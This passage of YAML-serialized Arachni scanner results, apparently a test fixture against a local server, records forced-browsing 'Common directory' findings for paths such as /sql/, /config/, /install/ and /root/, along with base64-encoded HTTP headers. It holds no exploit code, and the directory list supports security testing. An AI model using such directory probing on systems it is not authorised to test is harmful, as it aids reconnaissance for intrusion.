!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/logfile/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/logfile/
injected: logfile
id: logfile
elem: path
remarks: {}
method: ''
response: logfile
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/logon/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/logon/
injected: logon
id: logon
elem: path
remarks: {}
method: ''
response: logon
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/guests/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/guests/
injected: guests
id: guests
elem: path
remarks: {}
method: ''
response: guests
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/root/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/root/
injected: root
id: root
elem: path
remarks: {}
method: ''
response: root
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/htdocs/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/htdocs/
injected: htdocs
id: htdocs
elem: path
remarks: {}
method: ''
response: htdocs
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/account/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/account/
injected: account
id: account
elem: path
remarks: {}
method: ''
response: account
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/sql/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/sql/
injected: sql
id: sql
elem: path
remarks: {}
method: ''
response: sql
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/file/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/file/
injected: file
id: file
elem: path
remarks: {}
method: ''
response: file
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/website/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/website/
injected: website
id: website
elem: path
remarks: {}
method: ''
response: website
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/setup/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/setup/
injected: setup
id: setup
elem: path
remarks: {}
method: ''
response: setup
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/conf/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/conf/
injected: conf
id: conf
elem: path
remarks: {}
method: ''
response: conf
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/config/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/config/
injected: config
id: config
elem: path
remarks: {}
method: ''
response: config
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/install/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/install/
injected: install
id: install
elem: path
remarks: {}
method: ''
response: install
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/users/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/users/
injected: users
id: users
elem: path
remarks: {}
method: ''
response: users
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/installer/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/installer/
injected: installer
id: installer
elem: path
remarks: {}
method: ''
response: installer
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
